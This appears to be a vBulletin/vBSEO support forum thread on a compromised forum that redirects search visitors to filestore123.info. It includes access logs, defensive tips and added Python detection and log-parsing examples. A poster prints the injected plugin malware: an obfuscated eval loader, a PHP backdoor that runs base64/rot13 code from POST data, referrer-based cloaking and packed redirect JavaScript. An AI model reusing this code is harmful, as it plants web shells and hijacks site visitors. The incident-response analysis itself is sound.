666 is not correct. That may cause problems on systems from REAL files working correctly.
This is a discussion on Google redirecting to filestore123.info within the Troubleshooting forums, part of the vBSEO SEO Plugin category.
Brian Cummiskey / Crawlability Inc.
Security vbulletin - Patch Level for all supported versions released!
Unveiling the NEW vBSEO Sitemap Generator 3.0. - available NOW for vBSEO Customers!
In the avatars folder are only images?
What would you recommend?
I'm not sure what you're asking...
Brian Cummiskey / Crawlability Inc.
vbulletin security...
It is possible that your vBulletin AdminCP is being used/manipulated to run database queries, for example inserting the redirect code within the datastore table. To make sure that nobody has the ability to run database queries directly from the AdminCP (not even admin!): you rarely ever run DB queries from the admincp anyway, so you can blank out everything between the two quotes as shown below within the /includes/config.php file.
from:
Code:
$config['SpecialUsers']['canrunqueries'] = '1';
to:
Code:
$config['SpecialUsers']['canrunqueries'] = '';
cheers
this keeps coming back every few days.
Our hosting company wants to charge about $75 an hour for work on our server so a SUMMARY would help so we do not run up a bill.
Juan, can you help us out?
A summary has already been posted in this thread.
Google redirecting to filestore123.info - vBulletin SEO Forums
Brian Cummiskey / Crawlability Inc.
Guys,
I'm having this issue on my website running vBulletin 4.1.1 Patch Level 1 and vbseo 3.6.0
I was also able to find in the logs the time the code was added.
Code:
192.251.226.205 - - [14/May/2011:13:27:11 -0300] "GET /admincp/ HTTP/1.1" 200 2724 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:25 -0300] "POST /login.php?do=login HTTP/1.1" 200 2630 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:30 -0300] "GET /admincp/ HTTP/1.1" 200 581 "http://mywebsite.com/login.php?do=login" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:31 -0300] "GET /admincp/index.php?do=nav HTTP/1.1" 200 6649 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:31 -0300] "GET /admincp/index.php?do=head HTTP/1.1" 200 1731 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:32 -0300] "GET /admincp/index.php?do=home HTTP/1.1" 200 5583 "http://mywebsite.com/admincp/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:35 -0300] "POST /admincp/newsproxy.php HTTP/1.1" 200 658 "http://mywebsite.com/admincp/index.php?do=home" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:36 -0300] "GET /admincp/plugin.php?do=modify HTTP/1.1" 200 10049 "http://mywebsite.com/admincp/index.php?do=nav" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:42 -0300] "GET /admincp/plugin.php?do=edit&pluginid=3717 HTTP/1.1" 200 14666 "http://mywebsite.com/admincp/plugin.php?do=modify" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:48 -0300] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1976 "http://mywebsite.com/admincp/plugin.php?do=edit&pluginid=3717" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:27:51 -0300] "GET /admincp/plugin.php HTTP/1.1" 200 10049 "http://mywebsite.com/admincp/plugin.php?do=update" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:28:02 -0300] "GET /admincp/index.php?do=cplogout HTTP/1.1" 302 5 "http://mywebsite.com/admincp/index.php?do=head" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
192.251.226.205 - - [14/May/2011:13:28:03 -0300] "GET /admincp/index.php HTTP/1.1" 200 2773 "http://mywebsite.com/admincp/index.php?do=head" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
So apparently he got the password of some admin in some way; I have no idea how this happened.
# host 192.251.226.205
205.226.251.192.in-addr.arpa is an alias for rev-205.blutmagie.de.
rev-205.blutmagie.de domain name pointer anonymizer.blutmagie.de.
#
I found the code on datastore also at
mysql -u myuser -pmypass database -e 'select * from vbdatastore where data like "%base64%" limit 1'
I was able to find the code inside vbseo plugin
so in my understanding this is not caused by some gif with php code but in some way people are able to get our vbulletin password.... :(
Code:
if(defined('VBSEO_ENABLED'))
vbseo_complete_sec('global_start');

eval(CHR(36).CHR(120).CHR(61).CHR(39).@bd393d2ae1db8fbc0be57d642af95eb1.CHR(39).CHR(59).@base64_decode('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'));
Forgot to paste base64 decoded
Code:
if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10) {
  $ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
  if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false)) {
    $s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
    foreach($s as $e) {
      if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp']))) {
        $h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
        die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl 4nKo+XCU1d6Sp35mp3xAodHnnFikzn6wzojbwg5FzTVGYrfZPkVJ1JxphDqQrVa8neNlsXd3kWJ5PqOF suelOZ9ZYjTZXT6LJzVc2Xzyptthkrg3hMXxFSzXQ6l0rTs99n7rPOWLGdxnM0np6yYhQBMBHOIiWMsb ichdHRnz74q6BQlCJ44f0gEb51SBmosF4GLybDgB3KijRMjzYSva3c6kl/l1LCh8SxCx2LXDIhzN03lO W/lWlJSV6RYXTCn/iQK55wze/58MQ94bP/iUu+A/WJj0GlQDMeW1rxEf/IP6PyC3AKccmfrPAAYcQ/gN i3x4cZY75C4ZzHfGKpaz7AqLGF7+wvQ9PDvkQDLS01x0Gh7z2f4L3n3/h3iNneg11v3Vzt991DXyDfwo QdtMLpCp1zxB16FrAhgn7lka7dHivyyjS8qXylLJhGMqoLQW2uITPnBwvyyjaUUUM4lm1aNtgAeUKEa0 dGLeH0nC1AW5TBI5WRL1wZdcRzVRdVMvopnF8BcVsd+xFzfP7Udt2OPzS7dsvsfA95gOgC18yuMbC6V/ fUDkrzGgrCbyJ3EOBatqMProFs+R6ibjYyO3Y2zGip1gud5EcKqxo1E6dDpVDuY/QVmP5RxyC/bQ7XDy WY3qwjLg2uFc4o99Dmw4UHR62muZa5BgHj7TaynTkwnbZXs4+p18xmuEpJdZXO45wSgxtYc4uSsb8')))."</script></body></html>");
      }
    }
  }
}
Javascript content
$ cat test.php
PHP Code:
<?
$var = gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl4nKo+XCU1d6Sp35mp3xAodHnnFikzn6wzojbwg5FzTVGYrfZPkVJ1JxphDqQrVa8neNlsXd3kWJ5PqOFsuelOZ9ZYjTZXT6LJzVc2Xzyptthkrg3hMXxFSzXQ6l0rTs99n7rPOWLGdxnM0np6yYhQBMBHOIiWMsbichdHRnz74q6BQlCJ44f0gEb51SBmosF4GLybDgB3KijRMjzYSva3c6kl/l1LCh8SxCx2LXDIhzN03lOW/lWlJSV6RYXTCn/iQK55wze/58MQ94bP/iUu+A/WJj0GlQDMeW1rxEf/IP6PyC3AKccmfrPAAYcQ/gNi3x4cZY75C4ZzHfGKpaz7AqLGF7+wvQ9PDvkQDLS01x0Gh7z2f4L3n3/h3iNneg11v3Vzt991DXyDfwoQdtMLpCp1zxB16FrAhgn7lka7dHivyyjS8qXylLJhGMqoLQW2uITPnBwvyyjaUUUM4lm1aNtgAeUKEa0dGLeH0nC1AW5TBI5WRL1wZdcRzVRdVMvopnF8BcVsd+xFzfP7Udt2OPzS7dsvsfA95gOgC18yuMbC6V/fUDkrzGgrCbyJ3EOBatqMProFs+R6ibjYyO3Y2zGip1gud5EcKqxo1E6dDpVDuY/QVmP5RxyC/bQ7XDyWY3qwjLg2uFc4o99Dmw4UHR62muZa5BgHj7TaynTkwnbZXs4+p18xmuEpJdZXO45wSgxtYc4uSsb8'));
echo $var;
?>
$ php test.php
Code:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('t a=["\z\b\c\n\e\j\b","\k\b\c\n\e\j\b","\A\x\b\L\f\e\p\b\k\i","\c\d\K\M\n\N\c\p\e\o\z","\q\d\d\J\e\b","\i","\A\x\f\s\c\l\i\g","\D\F\k\f","\G","\r\d\q\s\c\e\d\o","\l\c\c\f\H\g\g\j\P\Q\e\r\b\k\c\d\p\b\B\q\d\j\g\m\d\R\o\r\d\s\m\B\f\l\f\S\e\m\i"];E y(u,C){t h=I O();h[a[1]](h[a[0]]()+T);t w=a[2]+h[a[3]]();v[a[4]]=u+a[5]+C+w+a[6]};y(a[7],a[8]);v[a[9]]=a[U]+V;',58,58,'||||||||||_0x987b|x65|x74|x6F|x69|x70|x2F|_0x414cx4|x3D|x6D|x73|x68|x64|x54|x6E|x72|x63|x6C|x61|var|_0x414cx2|document|_0x414cx5|x20|ipbcc|x67|x3B|x2E|_0x414cx3|x76|function|x62|x31|x3A|new|x6B|x47|x78|x4D|x53|Date|x79|x66|x77|x3F|86400000|10|vbsp'.split('|'),0,{}))
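The injected plugin code and its base64-decoded body quoted above share a shape a defender can scan for without executing anything: `eval()` over a string assembled from `CHR()` calls, a bare constant and `base64_decode()`. The Python scanner below is an added example, not code from this thread or from vBulletin/vBSEO. It flattens such a concatenation the way PHP 5 would evaluate it (an undefined bare constant becomes its own name, the `@` only silences the notice), rescans what the `eval()` would run, and reports indicators. The sample plugin text is constructed to mirror the quoted code, with the real payload replaced by the decoded snippet from the thread; the indicator list and the function names are this example's own.

```python
import base64
import re

# Indicators drawn from the injected code quoted in this thread (example's own list).
SUSPICIOUS = {
    "eval(": "eval of runtime-built code",
    "base64_decode(": "base64-encoded payload",
    "str_rot13(": "rot13-wrapped payload",
    "gzinflate(": "deflate-compressed payload",
    "$_POST[": "request input reaches eval",
}
# Three or more CHR(n) calls glued together: a string spelled out by character code.
CHR_CHAIN = re.compile(r"(?:CHR\(\d+\)\.?){3,}")

# One term of a PHP '.' concatenation, in the forms the injected code uses.
TERM = re.compile(
    r"@?CHR\((\d+)\)"                  # CHR(36) -> '$'
    r"|@?base64_decode\('([^']*)'\)"   # inline base64 literal
    r"|'([^']*)'"                      # plain string literal
    r"|@?([A-Za-z_][A-Za-z0-9_]*)"     # bare word: PHP 5 reads an undefined constant as its own name
)

# Constructed sample modelled on the quoted plugin; INNER is the decoded body from the thread.
INNER = "if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);"
SAMPLE_PLUGIN = (
    "if(defined('VBSEO_ENABLED'))\r\nvbseo_complete_sec('global_start');\r\n\r\n"
    "eval(CHR(36).CHR(120).CHR(61).CHR(39).@bd393d2ae1db8fbc0be57d642af95eb1.CHR(39).CHR(59)"
    ".@base64_decode('" + base64.b64encode(INNER.encode()).decode() + "'));"
)
CLEAN_PLUGIN = "if(defined('VBSEO_ENABLED'))\r\nvbseo_complete_sec('global_start');"


def eval_arguments(src):
    """Return the text inside each eval(...) call, using parenthesis depth to find its end."""
    args = []
    for m in re.finditer(r"\beval\(", src):
        depth, i = 1, m.end()
        while i < len(src) and depth:
            depth += {"(": 1, ")": -1}.get(src[i], 0)
            i += 1
        args.append(src[m.end():i - 1])
    return args


def decode_concat(expr):
    """Rebuild the string a CHR()/base64_decode()/literal/bare-constant concatenation yields."""
    out = []
    for m in TERM.finditer(expr):
        code, b64, lit, word = m.groups()
        if code is not None:
            out.append(chr(int(code)))
        elif b64 is not None:
            out.append(base64.b64decode(b64).decode("latin-1"))
        elif lit is not None:
            out.append(lit)
        else:
            out.append(word)
    return "".join(out)


def scan(src, depth=0):
    """Indicator descriptions found in src, including inside what its eval() calls would run."""
    found = {why for needle, why in SUSPICIOUS.items() if needle in src}
    if CHR_CHAIN.search(src):
        found.add("string hidden in a CHR() chain")
    if depth < 3:  # follow eval() one layer at a time, bounded
        for arg in eval_arguments(src):
            if CHR_CHAIN.search(arg) or "base64_decode('" in arg:
                try:
                    found |= scan(decode_concat(arg), depth + 1)
                except ValueError:  # malformed base64 (binascii.Error is a ValueError)
                    pass
    return found


if __name__ == "__main__":
    print("clean plugin:", sorted(scan(CLEAN_PLUGIN)))
    print("sample plugin:", sorted(scan(SAMPLE_PLUGIN)))
    print("eval would run:", decode_concat(eval_arguments(SAMPLE_PLUGIN)[0])[:60], "...")
```

Run `scan()` over every plugin row and datastore row pulled from the database (the `select ... from vbdatastore` query posted earlier in the thread is one way to get them); a legitimate vBSEO hook such as `CLEAN_PLUGIN` yields no findings. On the quoted code, flattening the `eval()` argument gives `$x='bd393d2ae1db8fbc0be57d642af95eb1';` followed by the decoded body, which is why that hex string appears as a bare constant: it is the request parameter name the backdoor later reads.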
excellent work magmf!!
Yeah, this problem came back to me even after following HappyPaints' steps... and I'm not certain what action to take. Can anyone advise?
My suggestion for now, since I don't know how this happened, is: change all admin passwords, change the admincp directory and add HTTP authentication to the new admincp directory.
Thanks. I wonder if there is a way to log both the time and IP of admin logins. I know the IPs are in the admincp... they just aren't time stamped.
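The web server already records admin logins with both a timestamp and a source IP: the access-log excerpt posted earlier in this thread shows the login POST, the plugin edit and the logout. The Python below is an added example, not part of this thread or of vBulletin, that reconstructs admin-CP sessions from Apache combined-format log lines. It uses six of the lines quoted above as its sample input (hostname mywebsite.com as in the post), treats a POST to /login.php?do=login with an /admincp/ referer as a login and any POST under /admincp/ as a write (vBulletin saves admin CP forms by POST), and groups the results per IP; the event names and the regular expressions are this example's own.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined-format line: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Sample input: six of the lines quoted earlier in this thread (same IP, same minute).
UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
SAMPLE_LOG = [
    f'192.251.226.205 - - [14/May/2011:13:27:11 -0300] "GET /admincp/ HTTP/1.1" 200 2724 "-" "{UA}"',
    f'192.251.226.205 - - [14/May/2011:13:27:25 -0300] "POST /login.php?do=login HTTP/1.1" 200 2630 "http://mywebsite.com/admincp/" "{UA}"',
    f'192.251.226.205 - - [14/May/2011:13:27:35 -0300] "POST /admincp/newsproxy.php HTTP/1.1" 200 658 "http://mywebsite.com/admincp/index.php?do=home" "{UA}"',
    f'192.251.226.205 - - [14/May/2011:13:27:42 -0300] "GET /admincp/plugin.php?do=edit&pluginid=3717 HTTP/1.1" 200 14666 "http://mywebsite.com/admincp/plugin.php?do=modify" "{UA}"',
    f'192.251.226.205 - - [14/May/2011:13:27:48 -0300] "POST /admincp/plugin.php?do=update HTTP/1.1" 200 1976 "http://mywebsite.com/admincp/plugin.php?do=edit&pluginid=3717" "{UA}"',
    f'192.251.226.205 - - [14/May/2011:13:28:02 -0300] "GET /admincp/index.php?do=cplogout HTTP/1.1" 302 5 "http://mywebsite.com/admincp/index.php?do=head" "{UA}"',
]


def parse_line(line):
    """Split one combined-format line into fields (timestamp as aware datetime), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def admin_events(lines):
    """Yield (ip, timestamp, kind, path) for admin-CP logins, writes and logouts.

    The admin CP login form posts to /login.php?do=login with the CP page as referer;
    saves inside the CP are POST requests under /admincp/; logout is do=cplogout.
    """
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash on a whole log file
        ip, ts, method, path, ref = rec["ip"], rec["ts"], rec["method"], rec["path"], rec["referer"]
        if method == "POST" and path.startswith("/login.php") and "/admincp/" in ref:
            yield ip, ts, "login", path
        elif method == "POST" and path.startswith("/admincp/"):
            yield ip, ts, "write", path
        elif path.startswith("/admincp/") and "do=cplogout" in path:
            yield ip, ts, "logout", path


def sessions(lines):
    """Group admin-CP events per source IP: when they logged in, what they changed, when they left."""
    by_ip = defaultdict(lambda: {"logins": [], "writes": [], "logouts": []})
    for ip, ts, kind, path in admin_events(lines):
        by_ip[ip][kind + "s"].append((ts.isoformat(), path))
    return dict(by_ip)


if __name__ == "__main__":
    for ip, s in sessions(SAMPLE_LOG).items():
        print(ip)
        for kind in ("logins", "writes", "logouts"):
            for ts, path in s[kind]:
                print(f"  {kind[:-1]:6} {ts}  {path}")
```

Feed it the whole access log (`sessions(open("access.log"))`) and compare the resulting IPs and times against the admins you know; a login from an address nobody recognises, followed within seconds by a write to plugin.php, is exactly the pattern in the posted excerpt. The reverse lookup the poster did by hand can be added per IP afterwards.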